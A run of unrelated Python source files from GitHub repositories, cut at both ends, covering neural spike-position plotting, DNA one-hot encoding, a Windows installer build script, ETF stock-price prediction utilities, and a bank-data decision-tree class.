np.load(os.path.join(base_folder, ct.TEMPLATE_MARKING_FILENAME))\n except FileNotFoundError:\n template_markings = np.ones((len(templates)))\n templates = templates[template_markings > 0, :, :]\n\n else:\n if new_templates_array.shape[1] > new_templates_array.shape[2]:\n templates = np.reshape(new_templates_array, (new_templates_array.shape[0],\n new_templates_array.shape[2],\n new_templates_array.shape[1]))\n else:\n templates = new_templates_array\n\n # Run the loop over all templates to get the positions\n counter = 0\n templates_positions = []\n for template in templates:\n relevant_channels = _get_relevant_channels_over_median_peaks(threshold, template)\n\n template_median_over_time = np.median(template, axis=0)\n peaks_to_median = template_median_over_time - template.min(axis=0)\n peaks_to_median = peaks_to_median[relevant_channels]\n\n relevant_channels_sorted = [v for (k, v) in sorted(zip(peaks_to_median, relevant_channels), reverse=True)]\n\n peaks_to_median_sorted = sorted(peaks_to_median, reverse=True)\n peaks_to_median_sorted.append(np.median(template_median_over_time[relevant_channels]))\n\n weights = _normalize(peaks_to_median_sorted)[:-1]\n relevant_channels_positions = channel_positions[relevant_channels_sorted]\n\n pos_x = relevant_channels_positions[0, 0]\n pos_y = relevant_channels_positions[0, 1]\n\n new_pos_x = pos_x - np.mean(((pos_x - relevant_channels_positions[:, 0]) * weights)[1:])\n new_pos_y = pos_y - np.mean(((pos_y - relevant_channels_positions[:, 1]) * weights)[1:])\n templates_positions.append([new_pos_x, new_pos_y])\n counter += 1\n if not (counter % 100):\n print('Completed ' + str(counter) + ' templates')\n\n templates_positions = np.array(templates_positions)\n\n np.save(os.path.join(base_folder, ct.WEIGHTED_TEMPLATE_POSITIONS_FILENAME), templates_positions)\n\n return np.array(templates_positions)\n\n\ndef get_y_spread_regions_of_bad_channel_groups(base_folder, bad_channel_groups):\n\n channel_positions = np.load(os.path.join(base_folder, 'channel_positions.npy'))\n bad_channel_groups_y_spreads = []\n for bc_group in bad_channel_groups:\n bc_positions = channel_positions[bc_group]\n top = bc_positions[:, 1].max()\n bottom = bc_positions[:, 1].min()\n bad_channel_groups_y_spreads.append([bottom, top])\n\n return bad_channel_groups_y_spreads\n\n\ndef view_spike_positions(spike_positions, brain_regions, probe_dimensions, labels_offset=80, font_size=20):\n \"\"\"\n Plot the spike positions as a scatter plot on a probe marked with brain regions\n\n :param spike_positions: the x,y positions of the spikes\n :type spike_positions: (np.array((N,2)))\n :param brain_regions: a dictionary with keys the names of the brain regions underneath the demarcating lines and\n values the y position on the probe of the demarcating lines\n\n :type brain_regions: dict\n :param probe_dimensions: the x and y limits of the probe\n :type probe_dimensions: (np.array(2))\n\n \"\"\"\n\n fig = plt.figure()\n ax = fig.add_axes([0.08, 0.05, 0.9, 0.9])\n ax.scatter(spike_positions[:, 0], spike_positions[:, 1], s=5)\n ax.set_xlim(0, probe_dimensions[0])\n ax.set_ylim(0, probe_dimensions[1])\n ax.yaxis.set_ticks(np.arange(0, probe_dimensions[1], 100))\n ax.tick_params(axis='y', direction='in', length=5, width=1, colors='b')\n for region in brain_regions:\n ax.text(2, brain_regions[region] - labels_offset, region, fontsize=font_size)\n ax.plot([0, probe_dimensions[0]], [brain_regions[region], brain_regions[region]], 'k--', linewidth=2)\n return fig, ax\n\n\ndef view_grouped_templates_positions(base_folder, brain_regions, probe_dimensions, position_multiplier=1,\n bad_channel_regions=None, template_info=None, labels_offset=80,\n font_size=20, dot_sizes=None,\n func_to_run_on_click=None, args_of_func=None):\n \"\"\"\n\n :param base_folder: the folder where all the npy arrays (template_markings etc.) are saved\n :type base_folder: string\n :param brain_regions: a dictionary with keys the names of the brain regions underneath the demarcating lines and\n values the y position on the probe of the demarcating lines\n :param probe_dimensions: the dimensions of the probe\n :type probe_dimensions: np.array(2)\n :type brain_regions: (dict{string: float})\n :param position_multiplier: a number multiplying the positions so that the numbers are not the arbitrary ones from\n the prb file but correspond to the length of the probe\n\n :type position_multiplier: float\n :param template_info: If provided the template_info will be used to define the types of the templates. It assumes\n the length of the template_info and of the loaded weighted_template_positions array is the same unless the\n template_info has template positions (position X and position Y column) in it. In this case these are used. Also\n the template_info is used to know which template is clicked on the figure for the on_pick event\n\n :type template_info: pd.Dataframe\n :param labels_offset: offset of the labels on the plot\n :type labels_offset: (int)\n :param font_size: the font size of the labels\n :type font_size: (int)\n :param func_to_run_on_click: The function to run on a click of a scatter point. It assumes that the first argument\n it needs is the template row of the template_info that was click.\n :type func_to_run_on_click: Func\n :param args_of_func: The arguments of the function to run on on_pick (after the template itself)\n :type args_of_func: list of objects\n :return:\n \"\"\"\n\n template_positions = np.squeeze(\n position_multiplier * np.load(os.path.join(base_folder, ct.TEMPLATE_POSITIONS_FILENAME)))\n\n if template_info is None:\n template_markings = np.load(os.path.join(base_folder, ct.TEMPLATE_MARKING_FILENAME))\n clean_template_markings = np.squeeze(template_markings[np.argwhere(template_markings > 0)])\n else:\n clean_template_markings = np.empty((len(template_info)))\n for t in ct.types:\n clean_template_markings[template_info['type'] == ct.types[t]] = t\n if ~np.isnan(template_info.iloc[0]['position X']):\n template_positions = template_info[['position X', 'position Y']].values * position_multiplier\n\n def on_pick(event):\n xmouse, ymouse = event.mouseevent.xdata, event.mouseevent.ydata\n ind = event.ind[0]\n x = template_positions[ind, 0]\n y = template_positions[ind, 1]\n print('________________________')\n print('x, y of mouse: {:.2f},{:.2f}'.format(xmouse, ymouse))\n print('Position: {}, {}'.format(str(x), str(y)))\n print('------------------------')\n if template_info is not None:\n template_number = template_info.iloc[ind]['template number']\n print('Template number = {}'.format(template_number))\n print('Firing frequency = {}'.format(template_info.iloc[ind]['firing rate']))\n print('Number of spikes = {}'.format(template_info.iloc[ind]['number of spikes']))\n print('________________________')\n if func_to_run_on_click is not None:\n if args_of_func is None:\n func_to_run_on_click(template_info.iloc[ind])\n else:\n func_to_run_on_click(template_info.iloc[ind], *args_of_func)\n\n types = np.flipud(np.unique(clean_template_markings))\n fig = plt.figure()\n ax = fig.add_axes([0.08, 0.05, 0.9, 0.9])\n fig.canvas.callbacks.connect('pick_event', on_pick)\n\n tolerance = 1\n cm = plt.cm.cool\n\n type_to_color = {1: (0, 61/255, 1, 1), 2: (27/255, 221/255, 206/255, 1), 3: (99/255, 214/255, 39/255, 1),\n 4: (255/255, 183/255, 0/255, 1), 5: (100/255, 100/255, 100/255, 1),\n 6: (170 / 255, 170 / 255, 170 / 255, 1), 7: (240/255, 240/255, 240/255, 1)}\n type_to_size = {1: 60, 2: 50, 3: 40, 4: 40, 5: 40, 6: 40, 7: 40}\n\n colors = np.array(len(template_positions) * [(0, 0, 0, 1)]).astype(float)\n sizes = np.array(len(template_positions) * [40.0])\n\n for type in types:\n indices_of_templates_of_type = np.squeeze(np.argwhere(clean_template_markings == type)).astype(np.int)\n if np.size(indices_of_templates_of_type) < 2:\n colors[indices_of_templates_of_type] = type_to_color[type]\n else:\n colors[indices_of_templates_of_type] = [type_to_color[type]]\n if dot_sizes is None:\n sizes[indices_of_templates_of_type] = type_to_size[type]\n\n if dot_sizes is not None:\n sizes = dot_sizes\n\n ax.scatter(template_positions[:, 0], template_positions[:, 1], s=sizes, c=colors,\n picker=tolerance)\n\n ax.set_xlim(0, probe_dimensions[0])\n ax.set_ylim(0, probe_dimensions[1])\n ax.yaxis.set_ticks(np.arange(0, probe_dimensions[1], 100))\n ax.tick_params(axis='y', direction='in', length=5, width=1, colors='b')\n\n if bad_channel_regions is not None:\n for bc_region in bad_channel_regions:\n bc_region = np.array(bc_region) * position_multiplier\n ax.add_patch(Rectangle((0, bc_region[0]),\n 100, bc_region[1] - bc_region[0],\n facecolor=\"grey\", alpha=0.5))\n\n for region in brain_regions:\n ax.text(2, brain_regions[region] - labels_offset, region, fontsize=font_size)\n ax.plot([0, probe_dimensions[0]], [brain_regions[region], brain_regions[region]], 'k--', linewidth=2)\n\n return fig, ax\n","repo_name":"georgedimitriadis/themeaningofbrain","sub_path":"BrainDataAnalysis/Spike_Sorting/positions_on_probe.py","file_name":"positions_on_probe.py","file_ext":"py","file_size_in_byte":20830,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"70132328516","text":"def create_seqs_dict(fasta):\n \"\"\"\n From a fasta file, the function builds a dictionary {label:sequence}.\n In fasta format, the even # lines are labels that start with \">\",\n the odd # lines are sequences.\n \"\"\"\n seqs = {}\n with open(fasta, \"r\") as f:\n last_label = \"\"\n for line, text in enumerate(f):\n if line % 2 == 0: # is label\n # Create new entry in dictionary for upcoming sequence\n seqs[text.strip()[1:]] = \"\"\n last_label = text.strip()[1:]\n else:\n # Add sequence to newly created entry\n seqs[last_label] = text.strip()\n return seqs\n\n\ndef create_seqs_matrix(seqs, SEQ_LEN):\n \"\"\"\n ONE-HOT ENCODING\n seqs is a dict mapping id:sequence\n return N x M x 5 tensor where each row is a M x 5 one-hot encoding of an M-length sequence\n \"\"\"\n seqs_m = np.zeros(shape=(len(seqs), SEQ_LEN, 5))\n seqs_index = {}\n # for i, seq_id in enumerate(tqdm(seqs)):\n for i, seq_id in enumerate(seqs):\n seqs_index[seq_id] = i\n for j, nucl in enumerate(seqs[seq_id]):\n if nucl == \"A\":\n seqs_m[i][j][0] = 1\n elif nucl == \"C\":\n seqs_m[i][j][1] = 1\n elif nucl == \"T\":\n seqs_m[i][j][2] = 1\n elif nucl == \"G\":\n seqs_m[i][j][3] = 1\n else:\n assert nucl == \"-\" or nucl == \"N\", f\"nucl: {nucl}\"\n seqs_m[i][j][4] = 1\n return seqs_m, seqs_index\n\n\ndef create_seqs_matrix_numerical(seqs, SEQ_LEN):\n \"\"\"\n seqs is a dict mapping id:sequence\n return index dictionary and an N x M matrix where each row encodes a sequence as {A,C, T, G, -} -> {0, 1, 2, 3, 4}\n \"\"\"\n seqs_m = np.zeros(shape=(len(seqs), SEQ_LEN))\n seqs_index = {}\n # for i, seq_id in enumerate(tqdm(seqs)):\n for i, seq_id in enumerate(seqs):\n seqs_index[seq_id] = i\n for j, nucl in enumerate(seqs[seq_id]):\n if nucl == \"A\":\n seqs_m[i][j] = 0\n elif nucl == \"C\":\n seqs_m[i][j] = 1\n elif nucl == \"T\":\n seqs_m[i][j] = 2\n elif nucl == \"G\":\n seqs_m[i][j] = 3\n else:\n assert nucl == \"-\" or nucl == \"N\"\n seqs_m[i][j] = 4\n return seqs_m, seqs_index","repo_name":"dannovikov/mcem","sub_path":"utils/seq_utils.py","file_name":"seq_utils.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72655282434","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nThis script has to be run from the main dir e.g. D:\\GitHub\\StructureFinder\n\"\"\"\nimport hashlib\nimport os\nimport sys\nfrom datetime import datetime\nfrom pathlib import Path\n\napp_path = str(Path(__file__).resolve().parent.parent)\nmain_path = str(Path(__file__).resolve().parent)\npathadd = [app_path, main_path, str(Path(app_path) / 'src')]\nsys.path.extend(pathadd)\n\nimport subprocess\n\n# noinspection PyUnresolvedReferences\nfrom PyQt5 import uic\n\nfrom scripts.version_numbers import disable_debug, pypath\nfrom structurefinder.misc.version import VERSION\n\nprint(\"Updating version numbers to version {} ...\".format(VERSION))\n\n# disable all debug variables:\nfor i in pypath:\n disable_debug(i)\n\nprint(\"Version numbers updated.\")\n\ntry:\n print(os.path.abspath('./src/structurefinder/gui'))\n uic.compileUiDir('./src/structurefinder/gui')\n print('recompiled ui')\nexcept:\n print(\"Unable to compile UI!\")\n raise\n\n\ndef sha512_checksum(filename, block_size=65536):\n \"\"\"\n Calculates a SHA512 checksum from a file.\n \"\"\"\n sha512 = hashlib.sha512()\n with open(filename, 'rb') as f:\n for block in iter(lambda: f.read(block_size), b''):\n sha512.update(block)\n return sha512.hexdigest()\n\n\ndef make_shasum(filename):\n sha = sha512_checksum(filename)\n shafile = Path('scripts/Output/StructureFinder-setup-x64-v{}-sha512.sha'.format(VERSION))\n shafile.unlink(missing_ok=True)\n shafile.write_text(sha)\n print(\"SHA512: {}\".format(sha))\n\n\ndef make_installer():\n innosetup_compiler = r'D:\\Programme\\Inno Setup 6/ISCC.exe'\n innosetup_compiler2 = r'C:\\Program Files (x86)\\Inno Setup 6/ISCC.exe'\n if not Path(innosetup_compiler).exists():\n innosetup_compiler = innosetup_compiler2\n subprocess.run([innosetup_compiler, '/Qp', f'/dMyAppVersion={VERSION}', r'scripts\\strf-install_win64.iss', ])\n\n\ndef compile_python_files():\n import compileall\n compileall.compile_dir(dir='dist', workers=2, force=True)\n compileall.compile_dir(dir='src', workers=2, force=True)\n\n\nif __name__ == '__main__':\n # Make binary distributions:\n make_installer()\n\n make_shasum(\"scripts/Output/StructureFinder-setup-x64-v{}.exe\".format(VERSION))\n\n print('\\nCreated version: {}'.format(VERSION))\n print(datetime.now().strftime(\"%d.%m.%Y %H:%M:%S\"))\n\n subprocess.call(\"scripts/Output/StructureFinder-setup-x64-v{}.exe\".format(VERSION))\n","repo_name":"dkratzert/StructureFinder","sub_path":"scripts/make_win_release.py","file_name":"make_win_release.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"} +{"seq_id":"24041276719","text":"# -*- coding: utf-8 -*-\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Spliting dataset into training and testing sets\nfrom sklearn.model_selection import train_test_split as sklearn_train_test_split\n\nfrom keras.callbacks import Callback\n\n\nclass SavePredictionCallback(Callback):\n counter = 0\n\n def __init__(self, predicted_prefix, X_train):\n self.predicted_prefix = predicted_prefix\n self.X_train = X_train\n\n def on_epoch_end(self, epoch, logs={}):\n self.model.reset_states()\n return\n\n\ndef load_csv(filepath, stock_id=None):\n \"\"\"\n Load a dataset from csv file.\n Arguments:\n filepath: Relative or absolute file path to the historical stock price in csv format.\n Returns:\n Full historical stock prices as a Dataframe\n \"\"\"\n print('historical data is loading from {}'.format(filepath))\n try:\n df = pd.read_csv(filepath, encoding='big5-hkscs', thousands=',')\n except:\n df = pd.read_csv(filepath, encoding='utf8', thousands=',')\n if stock_id is not None:\n # Extracting/Filtering the training dataset by stock_id\n column = df.columns[0]\n query_stock_id = df[column] == stock_id\n df = df[query_stock_id]\n return df\n\n\ndef get_model_name(stock_id):\n return 'etf_{}_model.h5'.format(stock_id)\n\n\ndef query_open_price(dataset, stock_id):\n \"\"\"\n Query open stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n dataset = dataset.loc[dataset[column] == stock_id]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 開盤價\n return dataset.iloc[:, 3:4].values\n\n\ndef query_close_price(dataset, stock_id):\n \"\"\"\n Query close stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n vol_column = dataset.columns[7]\n dataset = dataset.loc[dataset[column]==stock_id]\n # Dropping row if volume == 0\n dataset = dataset.loc[dataset[vol_column]>0]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 收盤價\n return dataset.iloc[:, 6:7].values\n\n\ndef query_high_price(dataset, stock_id):\n \"\"\"\n Query high stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n dataset = dataset.loc[dataset[column] == stock_id]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 高價\n return dataset.iloc[:, 4:5].values\n\n\ndef query_low_price(dataset, stock_id):\n \"\"\"\n Query low stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n dataset = dataset.loc[dataset[column] == stock_id]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 低價\n return dataset.iloc[:, 5:6].values\n\n\ndef query_avg_price(dataset, stock_id):\n \"\"\"\n Query avg stock price by stock id.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n dataset = dataset.loc[dataset[column] == stock_id]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 高低價平均\n return dataset.iloc[:, 4:6].mean(axis=1).values.reshape(-1, 1)\n\n\ndef query_volume(dataset, stock_id):\n \"\"\"\n Query volume by stock id.\n Arguments:\n dataset: Full historical volume as a Dataframe\n stock_id: A stock id\n Returns:\n Sequence of volume as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Extracting/Filtering the training dataset by stock_id\n column = dataset.columns[0]\n vol_column = dataset.columns[7]\n dataset = dataset.loc[dataset[column] == stock_id]\n # Dropping row if volume == 0\n dataset = dataset.loc[dataset[vol_column]>0]\n assert dataset.size > 0, 'dataset is empty while quering stock id {}'.format(stock_id)\n # Returning 成交量\n return dataset.iloc[:, 7:8].values\n\n\ndef load_weighted_csv(filepath, stock_df):\n print('historical weighted stock price is loading from {}'.format(filepath))\n assert type(stock_df) is pd.DataFrame, 'unexpected type of series: {}'.format(type(stock_df))\n try:\n df = pd.read_csv(filepath, encoding='big5-hkscs', thousands=',')\n except:\n df = pd.read_csv(filepath, encoding='utf8', thousands=',')\n # Extracting/Filtering the training dataset by date range from stokc_df\n date = stock_df[stock_df.columns[1]]\n query_date_range = df['date'].isin(date)\n df = df[query_date_range]\n assert stock_df.shape[0] == df.shape[0], 'dataframe size does not match stock_df({}) df({})'.format(stock_df.shape[0], df.shape[0])\n return df\n\n\ndef query_weighted_open_price(dataset):\n \"\"\"\n Query weighted open stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 收盤價\n return dataset.iloc[:, 1:2].values\n\n\ndef query_weighted_close_price(dataset):\n \"\"\"\n Query weighted close stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 收盤價\n return dataset.iloc[:, 4:5].values\n\n\ndef query_weighted_high_price(dataset):\n \"\"\"\n Query weighted high stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 收盤價\n return dataset.iloc[:, 2:3].values\n\n\ndef query_weighted_low_price(dataset):\n \"\"\"\n Query weighted low stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 收盤價\n return dataset.iloc[:, 3:4].values\n\n\ndef query_weighted_avg_price(dataset):\n \"\"\"\n Query weighted avg stock price.\n Arguments:\n dataset: Full historical stock prices as a Dataframe\n Returns:\n Sequence of stock price as a NumPy array.\n \"\"\"\n assert type(dataset) is pd.DataFrame, 'unexpected type of series: {}'.format(type(dataset))\n # Returning 高低價平均\n return dataset.iloc[:, 2:4].mean(axis=1).values.reshape(-1, 1)\n\n\ndef plot_stock_price(series, first_ndays=0, last_ndays=0, filename=None):\n \"\"\"\n Plot stock price.\n Arguments:\n series: Sequence of observations as a NumPy array.\n first_ndays, last_ndays:\n If both are 0, plot whole series, otherwise plot first N days or plot last N days instead.\n Returns:\n N/A\n \"\"\"\n assert type(series) is np.ndarray, 'unexpected type of series: {}'.format(type(series))\n if first_ndays == 0 and last_ndays == 0:\n plt.plot(series, color='blue', label='Stock Price')\n elif first_ndays > 0:\n plt.plot(series[:first_ndays, :], color='blue', label='Stock Price')\n else:\n plt.plot(series[-last_ndays:, :], color='blue', label='Stock Price')\n plt.title('Stock Price')\n plt.xlabel('Time')\n plt.ylabel('Stock Price')\n plt.legend()\n if filename is not None:\n plt.savefig(filename)\n plt.close()\n else:\n plt.show()\n\n\ndef plot_real_predicted_stock_price(real_price, predicted_price, title, first_ndays=0, last_ndays=0, filename=None):\n \"\"\"\n Plot stock price.\n Arguments:\n real_price: Sequence of real price as a NumPy array.\n predicted_price: Sequence of predicted price as a NumPy array.\n first_ndays, last_ndays:\n If both are 0, plot whole series, otherwise plot first N days or plot last N days instead.\n Returns:\n N/A\n \"\"\"\n assert type(real_price) is np.ndarray, 'unexpected type of real_price: {}'.format(type(real_price))\n assert type(predicted_price) is np.ndarray, 'unexpected type of predicted_price: {}'.format(type(predicted_price))\n assert(real_price.shape[0] == predicted_price.shape[0])\n if first_ndays == 0 and last_ndays == 0:\n plt.plot(real_price, color='red', label='Real Price')\n plt.plot(predicted_price, color='blue', label='Predicted Price')\n elif first_ndays > 0:\n plt.plot(real_price[:first_ndays, :], color='red', label='Real Price')\n plt.plot(predicted_price[:first_ndays, :], color='blue', label='Predicted Price')\n else:\n plt.plot(real_price[-last_ndays:, :], color='red', label='Real Price')\n plt.plot(predicted_price[-last_ndays:, :], color='blue', label='Predicted Price')\n plt.title(title)\n plt.xlabel('Time')\n plt.ylabel('Stock Price')\n plt.legend()\n if filename is not None:\n plt.savefig(filename)\n plt.close()\n else:\n plt.show()\n\n\ndef moving_average(series, window=5):\n \"\"\"\n Calculating moving average of a time series dataset.\n Arguments:\n series: Sequence of observations as a NumPy array.\n window: Size of the moving window.\n This is the number of observations used for calculating the statistic.\n Returns:\n Moving average of stock price as a NumPy array.\n \"\"\"\n assert type(series) is np.ndarray, 'unexpected type of series: {}'.format(type(series))\n\n dataset_ma = pd.DataFrame(series).rolling(window=window).mean().values\n\n # calculating first N=window values instead of NaN\n sum = 0\n for i in range(window):\n sum += series[i]\n dataset_ma[i] = sum/(i+1)\n\n return dataset_ma\n\n\ndef series_to_supervised(series, n_in, n_out):\n \"\"\"\n Frame a time series as a supervised learning dataset.\n Arguments:\n series: Sequence of observations as a NumPy array.\n n_in: Number of observations as input (X).\n n_out: Number of observations as output (y).\n Returns:\n NumPy array of series for supervised learning.\n \"\"\"\n assert type(series) is np.ndarray, 'unexpected type of series: {}'.format(type(series))\n assert(series.shape[0] > n_in + n_out)\n assert(series.shape[1] == 1)\n # Composing time sequence dataset with timesteps + target\n supervised = []\n for i in range(n_in, len(series) - n_out + 1):\n supervised.append(series[i - n_in:i + n_out, 0])\n return supervised\n\n\ndef normalize_windows(series):\n \"\"\"\n Normalize dataset to improve the convergence\n Normalize each value to reflect the percentage changes from starting point.\n Arguments:\n series: Sequence of observations as an array of NumPy array.\n Returns:\n NumPy array of normalized series for supervised learning.\n \"\"\"\n assert type(series) is list, 'unexpected type of series: {}'.format(type(series))\n assert type(series[0]) is np.ndarray, 'unexpected type of series: {}'.format(type(series[0]))\n df = pd.DataFrame(series)\n df = df.div(df[0], axis=0) - 1\n # replace NaN and Inf with 1\n df = df.fillna(0).replace(np.inf, 0)\n return df.values\n\n\ndef predict_split(Xy):\n \"\"\"\n Split supervised learning dataset into predicting sets\n Arguments:\n Xy: Two dimensions of sequence observations as a NumPy array.\n \"\"\"\n assert type(Xy) is np.ndarray, 'unexpected type of Xy: {}'.format(type(Xy))\n assert(Xy.shape[0] > 1)\n\n # Historical price for prediction\n X = Xy[-1:, :]\n\n # Reshape the inputs from 1 dimenstion to 3 dimension\n # X.shape[0]: batch_size which is number of observations\n # X.shape[1]: timesteps which is look_back\n # 1: input_dim which is number of predictors\n X = np.reshape(X, (X.shape[0], X.shape[1], 1))\n\n return X\n\n\ndef train_test_split(Xy, num_forecasts, test_samples=0):\n \"\"\"\n Split supervised learning dataset into training and testing sets\n Arguments:\n Xy: Two dimensions of sequence observations as a NumPy array.\n test_samples:\n If test_samples > 0, reserve the last test_samples days (axis 0) of\n sequence observations as test set.\n If test_samples = 0, random reserve 20% of sequence observations as test set.\n num_forecasts:\n Number of timesteps to be predicted base on remaining observations.\n \"\"\"\n assert type(Xy) is np.ndarray, 'unexpected type of Xy: {}'.format(type(Xy))\n assert Xy.shape[0] > test_samples, 'Xy.shape[0] is {} and test_samples is {}'.format(Xy.shape[0], test_samples)\n assert(Xy.shape[1] > num_forecasts)\n\n # Historical price for regression\n X = Xy[:, :-num_forecasts]\n # Target price for regression\n y = Xy[:, -num_forecasts:]\n\n # Spliting dataset into training and testing sets\n if test_samples > 0:\n # Select the last ndays working date for testing and the others for training.\n X_train = X[:-test_samples, :]\n y_train = y[:-test_samples, :]\n X_test = X[-test_samples:, :]\n y_test = y[-test_samples:, :]\n else:\n # Select 20% of the data for testing and 80% for training.\n # Shuffle the data in order to train in random order.\n X_train, X_test, y_train, y_test = sklearn_train_test_split(X, y, test_size=0.2, shuffle=True, random_state=0)\n\n # Reshape the inputs from 1 dimenstion to 3 dimension\n # X_train.shape[0]: batch_size which is number of observations\n # X_train.shape[1]: timesteps which is look_back\n # 1: input_dim which is number of predictors\n X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))\n X_test = np.reshape(X_test, (X_test.shape[0], X_test.shape[1], 1))\n\n return X_train, X_test, y_train, y_test\n\n\ndef visualize_model(loader, model, stock_id, ndays, plot_prefix):\n X_train, y_train, X_test, y_test = loader.data_last_ndays_for_test(int(stock_id), ndays=ndays)\n X_ori_train, y_ori_train = loader.ori_train_data()\n X_ori_test, y_ori_test = loader.ori_test_data()\n\n # Normalized prediction\n real_price = y_test\n predicted_price = model.predict(X_test)\n predicted_price1 = predicted_price\n predicted_price2 = predicted_price\n\n if ndays > 1:\n real_price = np.concatenate((real_price[0], np.array(real_price)[1:, -1]))\n predicted_price1 = np.concatenate((predicted_price1[0], np.array(predicted_price1)[1:, -1]))\n else:\n real_price = real_price.transpose()\n predicted_price1 = predicted_price1.transpose()\n\n filename = '{}_normalized.png'.format(plot_prefix)\n plot_real_predicted_stock_price(\n real_price,\n predicted_price1,\n 'Normalized Stock Price Prediction',\n filename=filename)\n\n # Inversed transform prediction\n real_price2 = y_ori_test\n predicted_price2 = loader.inverse_transform_prediction(predicted_price)\n\n if ndays > 1:\n real_price2 = np.concatenate((real_price2[0], np.array(real_price2)[1:, -1]))\n predicted_price2 = np.concatenate((predicted_price2[0], np.array(predicted_price2)[1:, -1]))\n else:\n real_price2 = real_price2.transpose()\n predicted_price2 = predicted_price2.transpose()\n\n filename = '{}.png'.format(plot_prefix)\n plot_real_predicted_stock_price(\n real_price2,\n predicted_price2,\n 'Stock Price Prediction',\n filename=filename)\n","repo_name":"jonascheng/tw-etf-price-prediction","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":17138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37719533982","text":"import numpy as np\n\n\nclass Feature:\n\n def __init__(self, terms, weight, base_size):\n self.label = terms.pop()\n self.attributes = terms\n self.weight = weight\n self.base_size = base_size\n\n def get_attributes(self):\n return self.attributes\n\n def get_label(self):\n return self.label\n\n def get_attribute_value(self, attribute):\n return self.attributes[attribute.index]\n\n def get_attribute_at(self, index):\n return self.attributes[index]\n\n def get_weight(self):\n return self.weight\n\n def get_base_size(self):\n return self.base_size\n\n def set_attribute_value(self, median, index):\n if float(self.attributes[index]) < median:\n self.attributes[index] = \"yes\"\n else:\n self.attributes[index] = \"no\"\n\n def convert_to_numeric(self):\n for i in range(0, 16):\n self.attributes[i] = Data.data_map[i][self.attributes[i]]\n self.label = Data.labels_map[self.label]\n\n def set_unknown_attribute(self, val, index):\n self.attributes[index] = val\n\n def set_weight(self, weight):\n self.weight = weight\n\n def set_base_size(self, base_size):\n self.base_size = base_size\n\n def __eq__(self, other):\n return self.attributes == other.attributes\n\n\nclass Attribute:\n\n def __init__(self, values, index):\n self.values = values\n self.index = index\n\n def __eq__(self, other):\n return self.index == other.index\n\n\n# Define data structures\nclass Data:\n \"\"\"Data class for bank data\n\n \"\"\"\n # All class attributes below are hard-coded due to poor data-desc.txt\n age = Attribute((0, 1), 0)\n job = Attribute((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12), 1)\n marital = Attribute((0, 1, 2), 2)\n education = Attribute((0, 1, 2, 3), 3)\n default = Attribute((0, 1), 4)\n balance = Attribute((0, 1), 5)\n housing = Attribute((0, 1), 6)\n loan = Attribute((0, 1), 7)\n contact = Attribute((0, 1, 2), 8)\n day = Attribute((0, 1), 9)\n month = Attribute((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12), 10)\n duration = Attribute((0, 1), 11)\n campaign = Attribute((0, 1), 12)\n pdays = Attribute((0, 1), 